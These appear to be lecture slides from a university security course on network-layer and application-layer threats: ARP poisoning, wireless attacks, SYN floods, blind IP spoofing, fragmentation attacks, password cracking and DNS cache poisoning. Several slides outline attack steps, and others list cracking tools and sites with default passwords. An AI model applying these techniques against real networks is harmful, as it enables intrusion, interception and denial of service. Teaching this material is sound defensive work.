CS687

CS687
Information Systems
Security
2. Threats and Attack Vectors

Threat at different layers …
 Link Layer Threats
 Network Layer Threats
 Transport Layer Threats
 [Application/Upper Layer Threats]

Link Layer Security Threats
 Wired data link layer attacks:

◦ MAC attacks
◦ ARP attacks
◦ Vlan hopping attacks (optional)
◦ Spanning Tree Protocol attacks (Optional)
 Wireless data link layer attacks:

◦ Default SSID and password
◦ SSID flaw attack
◦ Parking Lot attack
◦ Fake access point
 Wired data link layer attacks:

◦ MAC attacks
◦ ARP attacks
MAC – Media Access Control
 MAC address format:
◦ 48 bits, universally unique address
◦ [It may also be 64 bits]
◦ Left 24 bits: Manufacturer code
◦ Right 24 bits: specific interface assigned by
manufacturer
◦ Example (in hexa): 00:25:96:FE:34:56
◦ If the bits are all 1’s (ie. all F’s in hexa), it is a
broadcast address.
Switch and MAC Table
 A Switch is a Layer 2 device that filters,
forwards, or floods frames based on the
destination address of each frame.
 It maintains a MAC address table in a

memory called content addressable
memory (CAM).
 The CAM is initially empty.
 The switch recreates this table every time it is
activated, using both the source MAC addresses
of incoming frames and the port number
through which the frame entered the switch.
 CAM table has a fixed size on a switch.

MAC attacks – MAC address spoofing
 In this attack, an attacker can change its mac
address to the mac address of a victim’s
machine in the network.
 Then engage in sending few frames so that the
switch updates its MAC table.
◦ The frames addressed to the victim’s machine will
then be redirected to the attackers machine (need
the victim’s machine be off?).
◦ This attack can also be used to bypass several
security measures taken by ISP's to block users.
MAC attacks – CAM Flooding
 In a typical MAC flooding attack, a switch is fed
many Ethernet frames, each containing random
source MAC addresses, by the attacker.
 This attack results into consuming the memory
allocated to the MAC address table in the switch.
 Once the MAC memory is full, the switch will act
like a hub broadcasting any frame in search of
finding the destination host.
 Use of MAC flooding attack:
◦ For sniffing (disclosure)
MAC/CAM Table flooded with
random MAC addresses
ARP – Address Resolution Protocol
 ARP maps logical Layer 3 addresses (IP Addresses) to layer 2
addresses (physical MAC addresses).
 A host makes an ARP request in order to map the IP address of
the destination (known) to it’s MAC address (to be found). All
the hosts on the subnet will receive and process the ARP
request but (supposedly) only the host that matches the IP
address in the request will send an ARP reply. [Use arp –a to check the arp table
on an end point]
 In addition, hosts may broadcast gratuitous ARP messages

(unsolicited) in which case a receiving host updates its ARP table
with the new physical-to-logical binding:
◦ “Hi all, I am 00:25:96:FE:34:56 and my IP address is 192.168.0.122”
◦ [use arping … to send gratuitous arp]
ARP Attacks – ARP Spoofing
 Gratuitous ARP message can be abused by an attacker in order
to broadcast a fake IP address in which case the receiving hosts
will definitely register the new mapping (as stated in the
previous slide).
 If host B poses as host A by sending gratuitous ARP message,
then subsequent communication destined to A will definitely be
received by B (and not A). [What if host A has already sent
gratuitous arp before B?]
 ARP Spoofing can be used to redirect traffic.

 ARP Spoofing attack tools: Dsniff, Cain & Abel, Arpspoof,
Arpoison and Ettercap etc.
ARP Attacks – ARP (Cache) Poisoning
 This is achieved when an attacker sends it’s address to
each of potentially communicating hosts (poisons) in such
a way that both “think” that they have their respected
address.
 This is achieved through fake ARP replies or through
gratuitous ARP message
 Once the victims’ ARP cache has been successfully
poisoned, each send packets to the attacker when they
supposedly communicating to each other.
 This puts the attacker in the middle of the

communications path between the two hosts; hence
effectively mounting a Man-In-The-Middle (MITM) attack.
Wireless data link layer attacks
 Refresher
 Wireless attacks:
◦ Default SSIDs and Passwords
◦ SSID flaw attack
◦ Sniffing attack
◦ MAC spoofing (wifi)
◦ Fake access point
◦ MAC spoofing: Already covered
Wireless network: Refresher
 A Wireless Local Area Network (WLAN) is a type of local area
network that uses high frequency radio waves rather than wires to
communicate between network-enabled devices.
 Range and bandwidth: 29 meters (11 Mbps) to 485 meters (for 1

Mbps)
 IEEE 802.11 series of standards

Wireless network: Refresher
 Ad-hoc mode (peer-to-peer): the wireless network is relatively
simple and consists of 802.11 network interface cards (NICs).
The networked computers communicate directly with one
another without the use of an access point.
 Infrastructure mode: the wireless network is composed of a

wireless access point(s) and 802.11 network interface cards
(NICs). The access point acts as a base station in an 802.11
network and all communications from all of the wireless
clients go through the access point.
Wireless network: Refresher – Infrastructure mode
 WLAN components:
◦ Access Point: a hardware device that allows wireless
communication devices (wireless stations) to connect to a
wireless network. An AP usually connects to a wired network
and facilitate data communication between wireless and wired
devices.
◦ Wireless stations (clients): Laptops, workstations, mobile phones,

barcode scanner, etc
Wireless network: Refresher – Infrastructure mode
Wireless network: Refresher - Authentication
 There are three main methods of authentication that are
used on today's wireless LANs: Open authentication,
Shared-key authentication and EAP
 Open Authentication: This can hardly be an authentication

scheme since the AP accepts any connection request
forwarded to it without verifying any identity. A station
need only know the Service-Set Identifier (SSID) of the AP
to engage in connection.
◦ The problem with this method is that the SSID is typically
broadcasted. When it is not, it can still be captured with sniffing
tools.
 Shared-key Authentication: This is a “challenge response”
scheme whereby the AP challenges the station if it can
supply a shared secret key that has to be exchanged
previously. Wired Equivalent Privacy (WEP/RC4) is used
for encrypting the “challenge” string.
◦ This is commonly used on individual and small business wireless
LAN implementations.
◦ There is no way for the station to authenticate the AP.
◦ WEP is now deprecated since vulnerabilities are discovered on the
underlying encryption algorithm – RC4.
 EAP (Extensible Authentication Protocol) authentication:
The most common method used by enterprises. The EAP
method utilizes an authentication server that is queried
for authentication using a variety of credential options
◦ The detail is left as “Optional Reading”.
Wireless network: Refresher – Data security
The following WLAN encryption methods have been in use:
 Wired Equivalent Privacy (WEP): This is the basic method used and
provides only data confidentiality. It is now deprecated because the
encryption keys can be “easily” cracked.
 Wi-Fi Protected Access (WPA): It is a basic security feature in the

IEEE 802.11 standard, intended to provide confidentiality over a
wireless network by encrypting information sent over the network.
WPA uses Temporal Key Integrity Protocol (TKIP) for data encryption.
◦ TKIP encryption is no longer considered as a secure implementation since
vulnerabilities were discovered in 2008.
Wireless network: Refresher - Encryption
 Wi-Fi Protected Access 2 (WPA2): based on IEEE 802.11i,
it is a new wireless security protocol in which only
authorized users can access a wireless device, with
features supporting stronger cryptography (e.g AES),
stronger authentication control (e.g. EAP), key
management, replay attack protection and data integrity.
Default SSIDs and Passwords
 WiFi access points are shipped with a default SSID and

password.
 Many sites maintain default “user id” and password:
◦ Datarecovery.com
◦ Cirt.net
◦ Github.com
◦ Etc
 An attacker can easily take control of the AP, change

settings or firmware, load malicious scripts, etc.
SSID Flaw attack
 Access points come with default SSIDs. Besides, SSIDs are
embedded in management frames that will be broadcasted
in clear text even if the AP is configured not to broadcast
on a regular interval.
 Regardless, if the SSID is captured, it is straight forward to

get connected to the AP especially on Wlan that uses
open-authentication.
 Tool: NetStumbler
Sniffing Attack
 Access points are usually public and the traffic may not be
encrypted.
 Hackers may use sniffing tools to disclose sensitive

information such as passwords or credit card holder data.
 Sniffing tools: Aircrack,-ng, tcpdump, Wireshark, Acrylic,

etc
MAC Spoofing (wifi)
 Access points can filter clients based on their MAC
addresses.
 If client’s MAC address is in the list then the client is

allowed access, denied otherwise.
 One can easily change its MAC address to a legit MAC

address to get wifi access.
Fake Access Point attack
 An attacker may also fool legitimate wireless clients into
connecting to the attacker’s own network by placing an
unauthorized access point with a stronger signal in close
proximity to wireless clients.
 The aim is to capture end-user passwords or other
sensitive data when users attempt to log on these rogue
servers.
 The attacker simply creates a hotspot on a smartphone

and wait to be paired with a tablet or laptop.
 Tools: Kali Linux (Backtrack)

“Advanced” attacks
 Advanced attacks need understanding of
cryptography.
 To be covered in Chapter 7!
WEP vulnerability related attacks
Optional Reading
 Shared-key authentication flaw
 Crypt-analysis of various categories
 Statistical analysis of cipher texts
Common hacker tools
• Aircrack-ng
• AirSnort
• Aircrack
• Kismet
• Cain and Abel
• InSSIDer
• NetStumbler
• Airjack: DoS attack
• Recommended assignment: Experiment on one of
the above tools (but do it ethically on your own
wLan)
Network/Transport Layer Security Threats
 SYN Flooding attack

 ICMP Flooding
 IP Spoofing attack
 TCP RST attack, …
 Land attack
 Fragmentation attack
◦ Teardrop
◦ Ping of death, etc
 Unauthorized state transition
 Routing algorithms related attack
 Etc
Reminder - IP header
Reminder – TCP Header
Reminder - TCP Connection: 3 Way Handshake
Host Host
A B
Send SYN seq = n
Receive SYN Segment

Send SYN seq= m, ACK n +1
Receive SYN + ACK

Send ACK m +1
Receive ACK
Reminder - Closing a TCP Connection
 Normal closing using FIN

⚫ Each direction is closed separately with its
own FIN and ACK
⚫ It is possible to close one while leaving the
other open
 Emergency Closing (Reset)
⚫ Using RST
⚫ Both direction is closed
SYN flooding (DoS attack)
 The idea is to flood the server with a half

open SYN request without completing
the connection with an ACK response.
SYN Flooding: How to
 The hostile client repeatedly sends TCP SYN segments
to every port on the server potentially using a fake IP
address.
 The server responds to each such attempt with a
SYN+ACK segment from each open port and with an
RST segment from each closed port.
 The hostile client do not send an ACK Segment. Rather,

it initiates a new connection request by sending a SYN
segment to the same destination.
SYN Flooding: How to
SYN Flooding
 The victim has to keep the half-opened connection in its

memory for certain amount of time (e.g. 75 seconds).
 There is an upper limit on the number of concurrent
SYN requests TCP can process for a given socket (called
backlog).
 This queue limit applies to both the number of
incomplete connections (the 3-way handshake is not
complete) and the number of completed connections
that have not been pulled from the queue by the
application (by way of the accept() system call).
SYN Flooding
 If this backlog limit is reached, TCP will silently discard

all incoming legit SYN requests until the pending
connections can be dealt with.
SYN Flooding with a spoofed address(to be seen later)
SYN Flooding: Exercise
 Exercise: Read about TCP Intercept as
a potential solution against SYN flooding.
 Describe what solution Google employ to

defend itself against similar DoS/DDoS
attacks?
ICMP Flooding (Smurf Attack)
 An attacker overloads its victim with a huge number of
ICMP Echo Requests (ping).
 A typical Smurf attack uses a broadcast address with the

victim’s address as the source address to the ICMP Echo
Request.
 That way, all those involved would respond with an ICMP

Echo Reply to the victim thus flooding it with excessive
responses.
ICMP Flooding (Smurf Attack)
UDP Flood (Fraggle Attack)
The equivalent of Smurf Attack but on UDP

rather than ICMP.
Left as an optional exercise!

IP Spoofing [Largely adopted from Purdue University Lecture]
 This is about faking own IP address (source IP address)
 Source IP address is usually ignored by the intermediate

routers. They only need the destination IP address to
forward packets.
 The source IP address is used by the destination node

when it has to respond back to the source (if it has to).
IP Spoofing
IP Spoofing
Let X-Attacker, A-Victim, B-Target
1. X (posing as A) − −− > B : SYN (Seq = M (random #))
2. B − −− > A : SYN + ACK: (Seq = N (random #) , Ack: M+1)
3. What is next ? [Ack N+1]

IP Spoofing – types of spoofing
1. Blind Spoofing
2. Non Blind Spoofing

IP Spoofing – blind spoofing
 Any returning packets goes back to the “victim’s”

machine (despite the fact that it has not engaged in
any communication with the target).
 This is blind spoofing since the attacker could not

have the possibility to inspect the returning packets
from the target.
Blind IP spoofing
 Of course, X will not see this return from B which
includes the random sequence number generated by B.
 X’s ability to guess the correct random sequence number

sent by B is critical to the success of the attack (ie. N).
 In order to complete the 3-way handshake for a new

connection, X (again posing as A) sends an ACK packet to
B with a guessed value for the acknowledgment number
‘N’+1.
Blind IP spoofing – if A is a trusted host …
 Should the guess happen to be right, X will have a one-way connection

with B.
 X will now be able to send commands to B and B could execute these

commands assuming that they were sent by the trusted host A.
 As to what commands B executes in such a situation depends on the

permissions available to the trusted host A at B.
 Inserting a backdoor into the system will be a simpler way of intrusion.

This is much simpler and safe since the attacker need not maintain the
current connection any longer.
Blind IP spoofing – Blind spoofing challenges
1. Host A’s “reaction” to the SYN+ACK segment

from B
2. Timing
3. Guessing the right sequence number (!)

Blind IP spoofing – Host A’s reaction
 If the SYN+ACK segment reaches Host A, then

Host A will surely send a RST segment to close the
connection because it did not request for it in the
first place.
 This will break the incomplete connection.

Blind IP spoofing – Host A’s reaction - Solution
 You need to put A “Out of game”!
1. Wait until A goes down or
2. Apply DoS attack such as “SYN Flood”

on A
Blind IP spoofing – Timing
 [Revising the role of TIME in TCP state transitions]
 This can be guessed by making a number of “ICMP Echo request”

(ping) to the target host before initiating the blind spoofing.
 In this case in particular, X need only estimate the time B takes to

generate and send the SYN+ACK segment to the victim (ie. Host
A).
 RTT or Round Trip Time is actually the time taken by a packet to

travel from the source to the destination and then back. Thus, the
time interval taken by the packet to reach from the source to the
destination can be found out by RTT/2.
Blind IP spoofing – Sequence number
 Critical to this exploit is X’s ability to

make a guess at the sequence number
that B will use when sending the
SYN+ACK packet to A at the beginning of
the exchange.
 X could gather a number of sequential/successive outputs of

B’s random number generator (PRNG) by initiating a SYN
request but not completing it.
 If B used a high-quality random number generator, it would
be virtually impossible for X to guess the next sequence
number that B would use.
 However, if the PRNG used by B is of poor quality, it may be
possible to construct a reasonably small sized set of possible
sequence numbers. This set is called the Spoofing Set.
 X would now construct an ACK packet flood each with
different sequence number taken from the spoofing set and
send the flood to the target host.
 Analysis of the various TCP implementations has

revealed that the spoofing set may be as small as
containing a single value to as large as containing several
million values.
 A researcher (Michael Zalewski) showed that with the
broadband bandwidths typically available to a potential
adversary “these days”, it would be feasible to “packet
flood” with a spoofing set as large as 5000 numbers
(before a RST is fired).
 This is a relatively small set to attempt blind IP spoofing!
IP Spoofing – Non blind spoofing
 In non-blind IP spoofing, the idea is for the attacker

to place “itself” in the path of communication
between the victim and the target machine.
◦ ➔ Man In The Middle (MITM)
 In this manner, the attacker need not guess the

sequence number because it will be in a position to
sniff or intercept it and play it back in real time.
IP Spoofing – Non blind spoofing – two scenarios
1. Attacker(X) and victim(A) are on the same network

segment (ie. on a subnet) but not necessarily the target(B).
In fact, it is an advantage to have the target further away
from the Victim.
2. Attacker and Victim are not in the same network segment

but attacker still succeeds in “placing” itself in the path of
communication between the victim and the target
(compromised gateway, etc). This is usually achieved by
introducing a malware in the victim’s machine.
IP Spoofing – …. In the same network
 General Idea: Attacker can intercept the victim’s

communication to effectively succeed in the “Man In The
Middle Attack”:
 MAC flooding
 MAC spoofing
 ARP poisoning
 ICMP redirects (Optional - Left as an exercise!)
 ICMP router advertisements (Optional - Left as an
exercise!)
IP Spoofing – …. Not in the same network
 Attacker uses (yet another) host on the victim’s

network segment (call it “fourth” host).
 This may be achieved using compromised router,

malware, etc.
 Or use source routing (Optional)

IP Spoofing – …. Source routing …Left to you
 The IP protocol has a feature (an option) that is called Source

Routing that makes it possible for the sender to specify a route
to follow.
 The reverse route is recorded back in the IP header and the

receiver has to send any answers along the same route.
 As a packet travels through the network, each router normally

examine the "destination IP address" and choose the next hop to
forward the packet to.
 In source routing, however, the "source" (i.e. the sender) makes

some or all of these decisions.
Network/Transport Layer Security
Threats
Blind IP Spoofing – Misconception
 There is no way for the attacker to surf the Internet,

chat online or send and receive emails using the
spoofed address (ie. Hiding your identity).
 The reason being that the attacker do not receive the

returning packets.
Threats
IP Spoofing Solution – Exercise
What is Egress and Ingress filtering?

How can they be used to partially mitigate IP Spoofing?
Threats
TCP/UDP Session Hijacking
 Reading exercise:
◦ Article will be sent by email on the topic

◦ Read about ‘TCP Packet Storms”
 [Optional] Exercise on hijacking tools: Juggernaut or

Hunt
 [Optional] Note:You may also refer articles on “Web

Session Hijacking” …
TCP RST Attacks
 Attackers inject an RST segment into an existing
TCP connection, causing it to be closed.
 The TCP Reset attack is made possible due to the

requirements that a TCP endpoint must accept
out of order packets that are within the range of
a window size, and the fact that Reset flags should
be processed immediately.
TCP RST Attacks: Challenges
 What are the difficulties of spoofing a RST

packet to break a remote connection?
⚫ Sequence number of the connection
⚫ Source port of the connection (destination
port is usually well known for known
applications)
Land Attack
 This is a single-packet DoS
 A LAND attack packet would consist of an attacking

system forwarding a packet (e.g., TCP SYN) to a
target system that contains both a source and
destination address of that target system.
 The target system would "lock up" when creating

connection state associated with the packet, or
would get stuck in a state where it continuously
replies to itself.
IP Fragmentation Attack
 Generic attack:
▪ IP fragment overlapped (Teardrop)
▪ IP fragmentation buffer full
▪ IP fragment overrun (Ping of death)
▪ IP fragment overwrite
▪ IP fragment too many datagrams
▪ IP fragment too incomplete datagrams
▪ Tiny fragmentation attack
▪ Etc
IP Fragmentation
 IP fragmentation is about breaking up a single

IP datagram into multiple packets of smaller size that suits
the actual size corresponding to the particular network
characteristic that is responsible to transfer the packet.
 Maximum length of an IP datagram is 65535 but most

transmission links enforce a smaller maximum packet
length limit (MTU – Maximum Transmission Unit)
 MTU for Ethernet is 1500 bytes.

IP Fragmentation:
Fields responsible for fragmentation
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+ |Version| IHL | Differentiative Services |
Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification | Flags |
Fragment Offset |<-- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live |
Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source
Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
IP Fragmentation
 DF bit (Don’t Fragment)

◦ 0 → May fragment
◦ 1 → Don’t fragment
 MF bit (More Fragment)

 0→ Last fragment
 1→ More fragments
 Fragment Offset: used to indicate the starting position of

each fragment relative to the original un-fragmented
packet (as multiple of 8 bytes).
IP Fragmentation
Source:https://www.cisco.com/c/en/us/support/docs/ip/generic-routing-encapsulation-
gre/25885-pmtud-ipfrag.html
Teardrop: IP fragment overlapped
An attacker could start transmitting fragmented IP

packets containing overlapped Fragment Offsets
making the victim unable to reassemble them
exhausting the victim’s resources and possibly
crashing it. (software error)
Teardrop Example
 Host A – M=1, FO = 370, Length=1500 → Host V
 Host A – M=0, FO = 300, Length= 760 → Host V
 FO=370 means this packet is to be inserted starting at the 370x8
bit position.
 FO=300 means this packet is to be inserted starting at the 300x8
bite position. Since the last packet is bigger than their difference
(70x8 = 560 bites ), some systems might get crashed in the
process of reassembling the packet.
 In addition, when the total length of the original data payload is
calculated (300*8 + 760 = 3160 bites), there is a mis-match in
terms of the last byte position which might still create a problem
on the receiving end.
 This is an implementation vulnerability
Ping of Death: IP fragment overrun
RFC 791 specifies that the maximum size of an IP packet is

65,535 bytes. An ICMP echo request with more than
65,507 (65,535-20 (ip-header)-8 (icmp-header)) bytes of data could
cause a remote system to crash while reassembling the
packet fragments.
Ping of Death
 Fragment packets each having a reasonable size

(<65507) but adds up to a bigger size than allowed
(ie. 65507).
 Many OSs crash, froze or reboot as a result. This is

again an implementation vulnerability.
 PoD can be combined with IP Spoofing to conceal

attacker’s identity.
[Unauthorized] state transition related attacks
Unauthorized state transition related attacks
 Optional reading
Routing algorithms related attack: Optional reading
 Flooding attack
 Sleep deprivation
 Impersonation attack
 Black hole attack
 Node isolation attack
 Packet mistreating
 Routing table poisoning
 Routing table overflow
 etc
Upper Layers Security Threats
Application (+ Presentation, Session)
 Password cracking
 DHCP Starvation
 Email spoofing
 Phishing
 ID Theft: Optional reading
 SQL injection:Will be covered in the lab (full coverage is left as an
exercise)
 Cross-site scripting
 Cross-site request forgery (CSRF): Optional reading
 DNS poisoning
 Pass the hash: Optional Reading exercise
 Path traversal: Optional Reading exercise
 Buffer overflow
 DDoS: Optional Reading exercise
Password Cracking
Password
A shared secret string used to authenticate a

user to a system or a service.
Password: Simple Authentication
 Passwords are mainly used to provide

simple or one-way authentication
 In many setups, the users do not

authenticate the system
Storing passwords
 Password is not supposed to be kept on a paper

or any other form.
 It shall be memorized and shall only be provided
when access to a system or a service is required.
 In most systems, however, passwords are saved in
a storage device under a strict access control
mediation.
 The passwords are stored in clear text (in older
systems) or in an encrypted (hashed) form in
modern systems.
Password: “Older” UNIX/Linux
 Kept in the file /etc/passwd.
 account:”cryptic” password:uid:gid:general
info:homedir:shell
 mtn:dERfuu4.fjhdss:31:129:Malkom Thon: /home/mtn:
/bin/ksh
 [local Windows account passwords are kept in SAM,
located in c:\windows\system32\config\. ]
 The root owns this file but users do have a limited access to
this file (say to change passwords). The program
/usr/bin/passwd which is root owned is used by any user to
change passwords.
 “Optional” EXC: Examine the “protection bits” of
/usr/bin/passwd program and determine how an ordinary
user could modify the file /etc/passwd without having a ‘write’
privilege.
Password: “Newer” Unix/Linux
 Kept in the file /etc/shadow which is

totally inaccessible to ordinary users.
 /etc/passwd now contains (only) other

login information such as user name,
home directory and shell to spawn (or
first program to run).
Password: Encrypting Passwords
 Passwords are stored encrypted (not in clear text).
 DES was used in earlier UNIX versions. In fact, the

password is used as a key to encrypt a fixed string.
 When a user supplies his/her password, the login

program (/usr/bin/login) checks whether the
supplied password can successfully decrypt to reveal
the fixed string.
Password: Early Unix …
 Takes password as the encryption key
 Use it to encrypt a 64-bit block of zeros (fixed string).
 The resulting 64-bit block of cipher text is then encrypted
again with the same password
 The whole process is repeated a total of 25 times.
 The final 64 bits are unpacked into a string of 11 printable
characters that are stored in the /etc/passwd file. (each of
the 11 characters holds 6 bits, represented as one of 64
characters in the set ".", "/", 0-9, A-Z, a-z, in that order)
Password: Hashing Passwords
 “Newer” UNIX versions use hash functions such as
MD5, SHA, Blowfish, …
 A hash function is a one-way function that

transforms an input string into an illegible text,
called digest. “It is computationally infeasible to
reverse the hash function.”
 When a user supplies his/her password, the login

program checks whether the supplied password can
successfully hashes into the digest already stored.
Password: Login into a System
 On a dedicated system
 On a LAN/Internet
➔ Exc: Where is the hashing/decryption

done?
Password: Changing Password
 On a dedicate system
 On a LAN/Internet
Password: Salt in your Password
 A salt is just a random string attached to the

password and then passes to the hash function for
storing. The salt itself is stored in clear text together
with the hashed digest.
 Stored: <salt, Hash(salt + password)>
 The salt is generated by the system.
 Note: The salt is not visible to ordinary users when

stored in shadow files.
Password: Salt in UNIX/Linux
 Two characters (in older systems)
 In newer versions: could be several

characters
Password: Advantages of Salt
 Protects against “Rainbow Tables” attacks where a list of pre-

computed hashed values are compared with the actual digests
stored in the system. Even if a match is found, the attacker would
still have to differentiate the password from the salt.
 Makes dictionary attacks and brute-force attacks for cracking large

number of passwords much slower.
 Same password used by different users (or same user on different

systems) will likely be hashed into different digest because of salt.
Cracking Passwords
Password cracking is about attempting to access a

password protected system either by guessing the secret
password [or by finding a way around the password.]
Cracking Passwords: “Benefits”
 Checking for strength/weakness of a

password (by System Admin)
 Recover lost passwords
 Look for a digital evidence (when

authorized by a judge)
Types of Password Attacks
 Sniffing Attack
 “Trojaned” Login
 Dictionary Attack
 Brute force Attack
 Rainbow Table
 Social engineering
Sniffing Attack
 Sniff the network and record authentication

sequence.
 If the password is in clear, identify and grab the

password.
 This is passive on-line attacks.

Trojaned “Login”
 A program is said to be “Trojaned” when it is illegally

modified in a way that poses as a perfectly legitimate
program on your computer but does some
subversive activities to the benefits of the hacker.
 A “Trojaned login” behaves “normally” for an

unsuspecting system admin. However, it may allow the
hacker to login without a proper (or a fake)
password.
Dictionary attack
 A dictionary file (a text file of words) is loaded into a

cracking application which is run against the stored hashed
passwords.
 There are a number of programs that automate these

attempts.
Brute force attack
 This is an attack that explores all combination of
characters (bits) in the password key space.
 A brute force attack is the most comprehensive form

of attack, though it may often take long time to
attempt all the possible combinations.
Brute Force Attack
 Try every possible combination of characters

within the range specified
 Eg. A two character (Latin Alphabet) password
generates 26*26 = 676 possible combinations (=
26 to the power of two).
 A 64 bits long password will generate 2 to the
power of 64 combination of passwords.
 The number of trials and hence the time it takes
to break increases exponentially as the password
size increases
BFA Performance
 The password will surely crack but at what
cost!!
 “A 7-character lower case password

requires about 4 hours to be recovered but
if you would like to try all combinations of
upper case and lower case letters, it will
require 23 days” (see next slide)
Character set
Length of
the lowerca lowercase Both lowercase all printable
password se letters and and uppercase ASCII
letters digits letters characters
<=4 instant 2 min
5 instant 2 min 12 min 4 hours
6 10 min 72 min 10 hours 18 days
7 4 hours 43 hours 23 days 4 years
8 4 days 65 days 3 years 463 years
4
9 6 years 178 years 44530 years
months
BFA Performance Improvements
 Faster computers
 Large memory size
 Distributed computing
Password: Rainbow Tables
Large lists of pre-computed passwords and their

digests.
Password cracking tools need only lookup these

tables for possible hits.
Rainbow table is a compromise on time complexity.

Password: Free Rainbow Tables
 FreeRainbowTables.com
 rainbowtables.shmoo.com/
 ophcrack.sourceforge.net/tables.php
 etc
Social Engineering: “The art of human hacking”
 Mandatory reading:
“Social engineering attack – A survey”,
By Fatima Salahdine * and Naima Kaabouch
School of Electrical Engineering and Computer Science,
University of North Dakota, Grand Forks, ND 58202, USA
Top Password Crackers and dumpers
1. Cain and Abel
2. John the Ripper
3. THC Hydra
4. Aircrack
5. L0phtcrack
6. Airsnort
7. Pwdump
8. Rainbow Crack
9. Brutus
Upper Layer Security Threats
DHCP Attacks – DHCP Starvation
 Dynamic Host Configuration Protocol (DHCP) is a network
protocol that assigns IP addresses, subnet masks, default
gateways, etc. to hosts on a TCP/IP network.
 DHCP Starvation attack is flooding the DHCP server with
requests for addresses thus consuming the leasable IP address
space.
 After a successful attack, the DHCP server will not be able to
offer new addresses to any future clients that join the network.
 DHCP starvation is usually done with a spoofed MAC address
 This is a DoS attack

Phishing
Mandatory reading:
“Understanding Phishing Techniques” by Deloitte:
https://www2.deloitte.com/content/dam/Deloitte/
sg/Documents/risk/sea-risk-cyber-101-part10.pdf
DNS (Cache) Poisoning
Supplying a bogus info into the contents of a
DNS cache.
Background
 Known by different names:

◦ Domain Name System
◦ Domain Name Service
◦ Domain Name Server
◦ Domain Name Space
Background …
 Its principal job is to translate symbolic hostnames
into the numerical IP addresses and vice versa.
 Hostname → IP Address
 A “distributed lookup” functionality.
 One of the largest distributed databases in the whole

world.
Background…
DNS Servers:
 13 root servers. The IP addresses of these root
servers are programmed into every name resolver so
that it never has to query anyone for the IP addresses
of the root servers. 6-10(??) in USA, 1 in Stockholm, 1
in Amsterdam, 1 in Tokyo
 20 generic Top Level Domains (gTLD)
 248 country code Top Level Domains (ccTLD)
 Multitude of servers in each organizations, companies,

etc
Background…
 When a client and a server gets connected,
they both need to exchange a number of
messages to the different DNS servers in
order to resolve the hostname – IP @
resolution in each direction.
 Client: DNS lookup
 Server: Reverse DNS lookup

Background …
 Any exchange with DNS is done on top of a TCP
communication.
 There is a 16-Bit random number associated with

each DNS session, called Transaction ID.
 The result of a DNS query is the IP

address/hostname and a time interval known as the
TTL (Time to Live). The TTL specifies the time
interval for which the response can be expected to
remain valid.
DNS Exchanges …
 Every client machine may run a number of client

applications (browsers, mail, telnet, rpc, etc) that all
query the DNS for their own individual connection.
 Same is true for server machines.
 A network segment (LAN) has a number of client or

server machines each running several applications that
need to make a number of DNS query.
DNS Exchanges …
If each one of the hundreds of million of computers on
the Internet carried out a DNS lookup, it would place
too great a burden on the DNS root servers. The
resulting traffic would have the potential of slowing down
the name lookup process to the point of becoming
useless. (DDoS by Design!!)
Improvements
Locally cache some of the results of the lookup queries

for “future” use.
 By the individual applications
 By the operating system
 By the “intermediate” DNS themselves
DNS Cache
 Should cache both the IP address/hostname and the
TTL.
 Subsequently, the local name-resolver will return the
cached entry instead of sending the query to the
remote name server as long as the query is made
within the TTL window.
 The TTL can be in units of minutes, hours, days, and

even weeks. Ordinarily, an ISP name server will cache
an IP address for a hostname for 48 hours.
DNS: Describe the following! (Exercise)
 Authoritative server
 Iterative and recursive query

DNS Cache: Problem
While DNS caching makes the hostname resolution

faster, there is a downside to caching:
Any changes to the DNS do not always take effect

immediately and globally.
DNS (Cache) Poisoning
Writing a fake IP address in the DNS cache for

a hostname, domain name, or another name
server.
Upper Layers Security Threats DNS
(Cache) Poisoning: How to
 Query the target’s DNS for an IP address of a victim
host name that you want it be cached in the target.
 Assuming that there is no recent name look up for

the victim’s host name at the target, the DNS server
will make a query to the name servers in charge of
the victim’s domain. This query will contain a
pseudorandom Transaction ID integer.
DNS (Cache) Poisoning …
 In another window you will simultaneously fire up a

script that floods the target with “manually” crafted
packets that look like the reply the DNS server is
expecting but that contain a fake IP address for the
victim’s host name.
 Each reply in the flood will contain a different

Transaction ID integer, with the hope that the
Transaction ID in one of those fake replies will match
the Transaction ID in the query sent out by the
victim.
DNS (Cache) Poisoning …
Subsequently, all DNS queries to the target for

the victim’s domain will be directed to the host
that belongs to the bad guys.
DNS (Cache) Poisoning … Challenges
 The challenge behind DNS cache poisoning is the use of a

16-bit Transaction ID integer that is sent with every DNS
query. This integer is supposedly randomly generated.
 Note, however, that a 16-bit ID can have a maximum of

64K possibilities which is relatively easier as compared to
the 32-bit sequence number we have seen in IP Spoofing
attack.
DNSSEC
 DNSSEC: Recommended Reading! (Please attempt this

exercise after we cover the chapter on Cryptography).
Buffer Overflow
Transfer of control to the code supplied by

the attacker resulting in the ability to execute
arbitrary code with the privileges of the
targeted process.
Buffer Overflow
 SANS Top 20
 Affects both OS and common applications

Buffer Overflow: History
 1988: The Morris Internet Worm uses the buffer

exploit in “fingerd” daemon
 1995: NCSA httpd 1.3 (Mosaic, the pre web
browser)
 1996: Smashing the stack for fun and profit
 2001: The Code Red worm
 2003: The Slammer worm
 2004: The Sasser worm
Buffer Overflow: History
 Due to legacy code

 Continuing careless programming practices
Buffer Overflow types
 Stack Overflow
 Heap Overflow
Stack Overflow
Process Space
 Text
 Data
 Stack
Text
The text region is fixed by the program and includes code
(instructions) and read-only data (ie. constants). This
region corresponds to the text section of the executable
file.
This region is normally marked read-only and any

attempt to write to it will result in a segmentation
violation.
Data
The data region contains initialized and

uninitialized data. Static variables are stored in
this region.
Stack
 A stack is an abstract data type frequently used in

computer science.
